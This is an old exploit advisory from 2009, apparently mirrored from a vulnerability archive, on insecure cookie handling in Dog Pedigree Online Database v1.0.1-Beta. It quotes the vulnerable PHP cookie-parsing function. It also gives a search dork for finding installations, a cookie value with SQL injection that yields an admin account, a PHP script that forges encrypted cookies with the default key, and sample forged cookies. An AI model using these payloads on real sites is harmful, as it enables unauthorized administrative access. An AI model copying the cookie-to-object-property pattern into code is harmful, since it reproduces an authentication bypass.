INSECURE COOKIE HANDLING VULNERABILITIES --Dog Pedigree Online Database v1.0.1-Beta-->

2009-05-21T00:00:00
ID SECURITYVULNS:DOC:21848
Type securityvulns
Reporter Securityvulns
Modified 2009-05-21T00:00:00

Description


INSECURE COOKIE HANDLING VULNERABILITIES --Dog Pedigree Online Database v1.0.1-Beta-->

CMS INFORMATION:

-->WEB: http://thewhippetarchives.net/twa_is_offline.php -->DOWNLOAD: http://sourceforge.net/projects/dogarchive -->DEMO: N/A -->CATEGORY: Genealogy -->DESCRIPTION: This project allows to setup and maintain a database for collecting (dog) pedigrees. The data will actually be collected... -->RELEASED: 2009-01-25

CMS VULNERABILITY:

-->TESTED ON: firefox 3 -->DORK: inurl:"printable_pedigree.php" -->CATEGORY: COOKIE AUTH-BYPASS (SQLi) / INSECURE COOKIE HANDLING -->AFFECT VERSION: <= 1.0.1 Beta -->Discovered Bug date: 2009-05-08 -->Reported Bug date: 2009-05-08 -->Fixed bug date: 2009-05-12 -->Info patch (v1.0.2): http://sourceforge.net/projects/dogarchive/ -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

///////

INTRO:

///////

Cookie name --> it could be configured, but any web change it.

Cookie protection --> Active by default, but some Webs use it and other neither (Because it needs php_mcrypt extension).

With cookie protection --> Any web change the $COOKIE_KEY value. Always by default

///////////////////////////

COOKIE AUTH-BYPASS (SQLi):

///////////////////////////


VULN FILE:

Path --> [HOME_PATH]/php_users/htdocs/ File --> users.php.inc Vuln function --> init()

function init() {

...

$cookie = $_COOKIE[$USER_COOKIE];
if &#40;isset&#40;$COOKIE_KEY&#41;&#41; {
    $iv = mcrypt_create_iv&#40;mcrypt_get_iv_size &#40;MCRYPT_BLOWFISH, MCRYPT_MODE_ECB&#41;,

MCRYPT_RAND); $cookie = mcrypt_decrypt(MCRYPT_BLOWFISH, $COOKIE_KEY, base64_decode($cookie), MCRYPT_MODE_ECB, $iv); } $cookie = rtrim($cookie);
$a = split('&', $cookie); $i = 0; while ($i < count($a)) { $b = split ('=', $a[$i]); $key = urldecode($b[0]); $value = urldecode($b[1]); $this->{$key} = $value; $i++; } $this->id = $this->{'uid'}; }

..


EXPLOIT:

1.-WITHOUT ENCRYPTION:

Add cookie --> Name ~> dogarchive_user_info

       --&gt; Value ~&gt; email=&amp;uid=-1&#37;20or&#37;201=1#&amp;seclev=

2.-WITH ENCRYPTION:

Add cookie --> Name ~> dogarchive_user_info

       --&gt; Value ~&gt; Ffq9xizFlqX&#37;2FLFytv2XsUILuolhabq3&#37;2BN5A0&#37;2B3ifmNdjLEIqh&#37;2BKIXA&#37;3D&#37;3D

Return --> Admin account.

//////////////////////////

INSECURE COOKIE HANDLING:

//////////////////////////

<<<<-------+++++++++ Condition: Search e-mail and uid (it's not difficult) ++++++++++--------->>>>


NOTE:

Use an cookie builder (need php_mcrypt extension) to encrypt the cookie value:

<?php

//Configure [real_email] and [real_uid] with your target

$COOKIE_KEY="somethingRAndoM9871234whateveryoulike"; //user.conf by default $cookie="email=".urlencode('[real_email]')."&uid=[real_uid]&seclev=1"; $iv = mcrypt_create_iv(mcrypt_get_iv_size (MCRYPT_BLOWFISH, MCRYPT_MODE_ECB), MCRYPT_RAND); $cookie = base64_encode(mcrypt_encrypt (MCRYPT_BLOWFISH, $COOKIE_KEY, $cookie, MCRYPT_MODE_ECB, $iv)); print "Cookie crypted-urlencode -->".urlencode($cookie)."\n";

?>


PoC:

1.-WITHOUT ENCRYPTION:

Add cookie --> Name ~> dogarchive_user_info

       --&gt; Value ~&gt; email=[real_email]&amp;uid=[real_uid]&amp;seclev=1

2.-WITH ENCRYPTION:

Add cookie --> Name ~> dogarchive_user_info

       --&gt; Value ~&gt; Use PHP script above

EXPLOIT:

1.-WITHOUT ENCRYPTION:

Add cookie --> Name ~> dogarchive_user_info

       --&gt; Value ~&gt; email=y3nh4ck3r@gmail.com&amp;uid=2422&amp;seclev=1

2.-WITH ENCRYPTION:

Add cookie --> Name ~> dogarchive_user_info

       --&gt; Value ~&gt; 7O&#37;2By0gnSt4KItondpdwQThDciQY6aR3QfFGEvZQzUGQWNkYwIUI4lfiZ1WQgnEc&#37;2B

*************

SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ...

*************

-------------------------------------------------------------------

*************

GREETZ TO: SPANISH H4ck3Rs community!

*************